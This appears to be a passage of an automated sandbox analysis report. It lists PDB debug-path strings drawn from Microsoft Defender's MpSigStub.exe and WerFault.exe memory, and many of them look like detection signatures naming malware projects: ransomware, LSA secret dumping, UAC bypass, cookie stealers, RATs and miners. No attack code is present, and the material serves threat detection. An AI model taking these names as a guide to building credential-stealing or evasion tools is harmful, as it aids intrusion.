Window detected: More than 3 window changes detected

Source:	Binary string: \Release\runner.pdb source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp
Source:	Binary string: ASAM\original\delfiletype\delfiletype\obj\Release\delfiletype.pdb source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp
Source:	Binary string: Release\arc_2010.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.2881791538.00000000049A2000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.2962036020.00000000051D2000.00000004.00000040.sdmp
Source:	Binary string: \fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000024.00000003.6293096859.00000197A3151000.00000004.00000001.sdmp
Source:	Binary string: \natchat-master\x64\Release\natchat.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.2857096900.0000000005434000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2918404291.00000000030C0000.00000004.00000001.sdmp
Source:	Binary string: c:\1\rich\look\80\24\Famous\35\72\special\22\melody.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source:	Binary string: CFy92ROzKls\ro\HwtAF.pdb source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp
Source:	Binary string: -:\MySpys\chrome_cookie_view\Release\crome.pdb source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp
Source:	Binary string: cts\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp
Source:	Binary string: .C:\SlackDismort\third\Release\SlackDismort.pdbat source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source:	Binary string: *.pdb.\|!\binplace.exe source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp
Source:	Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdbxx source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: dciman32.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source:	Binary string: Release\NexGenMediaPlayerApp.pdb source: MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp
Source:	Binary string: msmdsrv.pdb source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp
Source:	Binary string: \BeamWinHTTP\Release\BeamWinHTTP.pdb source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\mshta\objfre\i386\mshta.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source:	Binary string: he#@1.Pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: heerhWHW#@1wHJnERbRW.Pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: LMIGuardianSvc.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source:	Binary string: +020202020202020202020202020202020202020.pdb source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp
Source:	Binary string: \Release\gogodele.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source:	Binary string: \\Desktop\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: N%Tray Me !.*\\Release\\Tray Me !\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: SpeedNewASK\Debug\spdfrmon.pdb source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp
Source:	Binary string: \bin\DownloaderExe.pdb source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp
Source:	Binary string: fastfat.pdbN source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source:	Binary string: wl-cmd\Release\dll1.pdb source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp
Source:	Binary string: \release\LSASecretsDump.pdb source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp
Source:	Binary string: PD:\projects\new_Clicker\SIV\original\daemon\NewClieckerDll\Release\SIVUpdate.pdb] source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp
Source:	Binary string: sctasks.pdbd source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\find\objfre\i386\find.pdb source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp
Source:	Binary string: ZUsers\Admin\Documents\Visual Studio 2015\Projects\Cryptor2.0 Simple\Release\Cryptor2.0.pdba source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp
Source:	Binary string: \WinCbt\Release\WinCbt.pdb source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp
Source:	Binary string: @C:\Users\AverageGoose\source\repos\GooseLab\Release\GooseLab.pdb source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source:	Binary string: usp10.pdb source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source:	Binary string: :b.ProgramISLNetworkStart_win32.0\Release\launch_normal.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source:	Binary string: g711codc.pdb3 source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source:	Binary string: reg.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source:	Binary string: Ransomware.pdbxN source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source:	Binary string: -GMGameStart\bin\release_static\GMUnPacker.pdba source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source:	Binary string: \SearchProtect\Bin\Release\ProtectService.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source:	Binary string: \x64\release\shell.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source:	Binary string: hWEHW#@HJERKJERJER^$.Pdb~ source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: mgr.pdb source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp
Source:	Binary string: \Release\ComBroadcaster.pdb source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp
Source:	Binary string: bot.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source:	Binary string: \\UniversalOrchestratorPrivEscPoc\\Release\\UniversalOrchestratorPrivEscPoc\.pdb source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source:	Binary string: .+:.*\\SkypeSpread.pdb source: MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp
Source:	Binary string: comp.pdbd source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp
Source:	Binary string: \Dolphin.pdb source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp
Source:	Binary string: c:\Documents and Settings\Administrator\My Documents\Visual Studio Projects\EASZZCDFR\Release\EASZZCDFR.pdb source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdbx source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp
Source:	Binary string: -C:\backward\inch\enumeration\Atmel\neces.pdb source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp
Source:	Binary string: Ivan\Documents\generic_exe\Release\BHO.pdb source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp
Source:	Binary string: \CCC\obj\Debug\CCC.pdb source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source:	Binary string: WhjrkehLkpe;rltjhpow;elkrjjklWEKL#.pdb] source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: EC:\Projects\Docwize\cUniFunctions\obj\DocwizeClient\cUniFunctions.pdbx source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp
Source:	Binary string: .+:\\src\\tcrypt\\Release\\s_(high\|low).pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source:	Binary string: c:\projects\cuspidPowershell\cuspid\EmbeddedDlls\AMSIFinder\AMSIFinder\obj\Release\AMSIFinder.pdb source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-io-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source:	Binary string: WanNengWB\WBUpd32.pdb source: MpSigStub.exe, 00000024.00000003.6319165087.00000197A48CC000.00000004.00000001.sdmp
Source:	Binary string: CryptoService.pdb source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp
Source:	Binary string: msasn1.pdb source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp
Source:	Binary string: ,\NetGuy_Explorer\Release\NetGuy_Explorer.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source:	Binary string: \TMain\Release\TSvr.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source:	Binary string: ,T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source:	Binary string: L%D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: \SearchProtect\bin\Release\HPNotify.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source:	Binary string: Bou3asba\obj\Release\Danao.pdb source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000005.00000003.2855689224.000000000292F000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962036020.00000000051D2000.00000004.00000040.sdmp
Source:	Binary string: c:\RPCInstall\Release\RPCInstall.pdb source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb0 source: WerFault.exe, 00000009.00000003.2962036020.00000000051D2000.00000004.00000040.sdmp
Source:	Binary string: Release DlpHook\Proxy.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source:	Binary string: $\SuperLight\release\MfcDllServer.pdba source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source:	Binary string: \Sample\Release\CNetworking.pdb source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp
Source:	Binary string: $\Season\Wife_low\531\Quart\table.pdb source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp
Source:	Binary string: 2Projects\VerifyAndLaunch\release\GCO Bootstrap.pdb source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp
Source:	Binary string: MC:\Users\wizzlabs\source\repos\ConsoleMap\ConsoleMap\obj\Release\Ehssassi.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source:	Binary string: \BypassUac\branches\Download\build\Release\service.pdb source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source:	Binary string: OC:\Users\hoogle168\Desktop\2008Projects\NewCoreCtrl08\Release\NewCoreCtrl08.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source:	Binary string: \CRP\Release\Mount.pdbaD source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source:	Binary string: :Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp
Source:	Binary string: \Release\MyEncrypter2.pdb source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source:	Binary string: 7h4qMQ1edvEOY+wQIOdVR_v.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: c:\dev\torntv\Release\TornTVApp.pdb source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp
Source:	Binary string: winlogon.PDB source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: K8MiniPage.pdbx source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp
Source:	Binary string: \RUNPCH\Release\GUO_CAU.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source:	Binary string: 0.pdb source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp
Source:	Binary string: \bundler\Production\bundler.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdbz~ source: WerFault.exe, 00000005.00000003.2881791538.00000000049A2000.00000004.00000040.sdmp
Source:	Binary string: api-ms-win-core-shlwapi-obsolete-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp
Source:	Binary string: D:\C++\AsusShellCode\Release\AsusShellCode.pdb source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp
Source:	Binary string: R,\\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdbx source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source:	Binary string: costura.injectordll.pdb source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp
Source:	Binary string: [H:\My Data\My Source Code\Microsoft Office 2010\AutoKMS\AutoKMS\obj\x86\Release\AutoKMS.pdb source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp
Source:	Binary string: mpengine.pdbOGPS source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source:	Binary string: A .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source:	Binary string: f:\project_2008\Fileman_candle_kgrid\Filebus\Bin\UpdateWindow.pdb source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp
Source:	Binary string: wRHWRH@4hjethwehgw.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source:	Binary string: unknowndll.pdba~ source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source:	Binary string: \fiDarSayebni.pdb source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp
Source:	Binary string: IperiusRDPClient.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source:	Binary string: %KMS Client\bin\Release\KMS Client.pdba} source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source:	Binary string: S\ccnet\Publish_Client\work\src\mainapp\Abacus.LaunchMail\bin\Release\LaunchMail.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\attrib\objfre\i386\attrib.pdbP& source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp
Source:	Binary string: wajam_goblin.pdb source: MpSigStub.exe, 00000024.00000003.6342578169.00000197A421C000.00000004.00000001.sdmp
Source:	Binary string: C:\SuccWare\SuccWare\obj\Debug\SuccWare.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source:	Binary string: \\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb( source: WerFault.exe, 00000005.00000003.2859654211.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2926621250.0000000006131000.00000004.00000001.sdmp
Source:	Binary string: joy.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source:	Binary string: d:\av\common_main.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\twunk_16\objchk\i386\twunk_16.pdb source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp
Source:	Binary string: MsiDatabaseMerge.pdb source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp
Source:	Binary string: WebBrowserPassView.pdb source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp
Source:	Binary string: msimg32.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source:	Binary string: E:\Work\SaveVid\Savevid-WS-Trunk\InstallCore\rbin\soffer.pdb source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp
Source:	Binary string: GCWYq1g.pdb source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp
Source:	Binary string: mfcsubs.pdb source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp
Source:	Binary string: Release\NtdsAudit.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: netsh.pdbj source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: mshta.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source:	Binary string: BTR.pdbGCTL source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source:	Binary string: PROZIPPER.pdb source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp
Source:	Binary string: D:\developement\projects\flood_load\Release\flood_load.pdb source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp
Source:	Binary string: sfxrar32\Release\sfxrar.pdbxB source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source:	Binary string: \\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000024.00000003.6298561221.00000197A4380000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdbz~ source: WerFault.exe, 00000005.00000003.2881791538.00000000049A2000.00000004.00000040.sdmp
Source:	Binary string: ddraw.pdb source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp
Source:	Binary string: GPDFDocument.pdb source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp
Source:	Binary string: wbadmin.pdb source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp
Source:	Binary string: *\ClientPlugin\obj\Release\ClientPlugin.pdb source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp
Source:	Binary string: Unite.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source:	Binary string: \Release\WCmouiTri.pdb] source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp
Source:	Binary string: \MailClient\Release\MailClient.pdb source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp
Source:	Binary string: :FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdbx source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp
Source:	Binary string: L%D:\\MyCode\\riot.?\\decryptor.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source:	Binary string: Flipopia.pdb source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp
Source:	Binary string: \Ozrenko\Documents\Work\Interstat2\Interstat2\Weather\Interstat.pdb source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp
Source:	Binary string: Downloads\notepad-master\Release\notepad.pdb source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp
Source:	Binary string: AdFind\Release\AdFind.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source:	Binary string: d:\young\swprojects\tdxin\bin\amd64\rtdxftex_amd64.pdb source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp
Source:	Binary string: nethtsrv.pdb source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp
Source:	Binary string: \Black Coding\RAT+BOT\WebServer 2.0\src\Release\WebServer.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source:	Binary string: S\\server\\V.\\Release\\PhantomNet.*\.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source:	Binary string: \PCHunter64.pdb source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp
Source:	Binary string: Release\toolbar_setup.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdbxc source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp
Source:	Binary string: rasautou.pdb source: MpSigStub.exe, 00000024.00000003.6279246359.00000197A4A35000.00000004.00000001.sdmp
Source:	Binary string: \obj\Release\PersistenceModule.pdb source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp
Source:	Binary string: ?ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdbac source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source:	Binary string: ?E:\hhu\TeamViewer_13.bjbj\BuildTarget\Release2017\tv_w32dll.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source:	Binary string: \i386\lanmandrv.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: \Release\corsar.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source:	Binary string: c:\divide\broad\Hole\DoThird.pdb source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp
Source:	Binary string: e:\updatecheck\UpdateCheck\release\UpdateCheck.pdb source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp
Source:	Binary string: XBundlerTlsHelper.pdb source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp
Source:	Binary string: UqxIkBeNYhKR.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source:	Binary string: e:\src\fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source:	Binary string: e:\builddata\Install\source\Min_Loader-BuildAndDeploy\Release\Loader_Resized.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: tdc.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source:	Binary string: mpg2splt.pdb source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp
Source:	Binary string: obj\Release\FlashPlayerApp.pdb source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp
Source:	Binary string: dxtrans.pdb source: MpSigStub.exe, 00000024.00000003.6270214588.00000197A4657000.00000004.00000001.sdmp
Source:	Binary string: c:\supply\trouble\Classwho.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source:	Binary string: \Microsoft Windows Search.pdb source: MpSigStub.exe, 00000024.00000003.6292407063.00000197A4EC4000.00000004.00000001.sdmp
Source:	Binary string: termsrv.pdb source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source:	Binary string: KF.+:\\Projects\\C#\\Sayad\\Source\\Client\\bin\\x86\\Debug\\Client.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source:	Binary string: AntiMalware_Pro.pdb source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp
Source:	Binary string: fc.pdb0 source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp
Source:	Binary string: \Gleaned\purecall\win32p6.pdb source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source:	Binary string: Slb.EP.Shell.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source:	Binary string: E@.+:\\Projects\\tidynet\\Release\\(selfdestruct\|tidynetwork).pdb source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp
Source:	Binary string: EFRE65.pdb source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp
Source:	Binary string: !#HSTR:PossiblyClean:magottei.pdb.A source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source:	Binary string: C>s:\\dEVELOPMdNT\\dC\+\+dCdyptordEvoldtiod_dld\\release\\m.pdb source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source:	Binary string: lIFdrGkmBePss.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source:	Binary string: CryARr.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdb source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp
Source:	Binary string: KSLDriver.pdbGCTL source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source:	Binary string: boteg.pdbxL source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
